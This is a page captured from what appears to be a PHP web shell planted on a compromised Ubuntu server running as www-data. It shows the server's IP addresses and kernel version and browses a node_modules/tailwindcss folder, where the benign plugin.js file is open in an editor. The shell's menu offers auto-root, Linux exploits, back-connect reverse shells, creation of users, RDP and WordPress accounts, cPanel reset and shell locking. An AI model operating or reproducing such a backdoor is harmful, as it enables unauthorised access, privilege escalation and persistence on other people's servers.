Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
tailwindcss /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
dr-xr-xr-x
css
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
postcss-plugins
[ DIR ]
dr-xr-xr-x
public
[ DIR ]
dr-xr-xr-x
util
[ DIR ]
dr-xr-xr-x
value-parser
[ DIR ]
dr-xr-xr-x
cli-peer-dependencies.js
793
B
-rw-rw-rw-
cli.js
75
B
-rw-rw-rw-
corePluginList.js
3.6
KB
-rw-rw-rw-
corePlugins.js
132.48
KB
-rw-rw-rw-
featureFlags.js
3.23
KB
-rw-rw-rw-
index.js
52
B
-rw-rw-rw-
plugin.js
2.04
KB
-rw-rw-rw-
processTailwindFeatures.js
3.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); const _setupTrackingContext = /*#__PURE__*/ _interop_require_default(require("./lib/setupTrackingContext")); const _processTailwindFeatures = /*#__PURE__*/ _interop_require_default(require("./processTailwindFeatures")); const _sharedState = require("./lib/sharedState"); const _findAtConfigPath = require("./lib/findAtConfigPath"); function _interop_require_default(obj) { return obj && obj.__esModule ? obj : { default: obj }; } module.exports = function tailwindcss(configOrPath) { return { postcssPlugin: "tailwindcss", plugins: [ _sharedState.env.DEBUG && function(root) { console.log("\n"); console.time("JIT TOTAL"); return root; }, async function(root, result) { var _findAtConfigPath1; // Use the path for the `@config` directive if it exists, otherwise use the // path for the file being processed configOrPath = (_findAtConfigPath1 = (0, _findAtConfigPath.findAtConfigPath)(root, result)) !== null && _findAtConfigPath1 !== void 0 ? _findAtConfigPath1 : configOrPath; let context = (0, _setupTrackingContext.default)(configOrPath); if (root.type === "document") { let roots = root.nodes.filter((node)=>node.type === "root"); for (const root of roots){ if (root.type === "root") { await (0, _processTailwindFeatures.default)(context)(root, result); } } return; } await (0, _processTailwindFeatures.default)(context)(root, result); }, _sharedState.env.DEBUG && function(root) { console.timeEnd("JIT TOTAL"); console.log("\n"); return root; } ].filter(Boolean) }; }; module.exports.postcss = true;
Close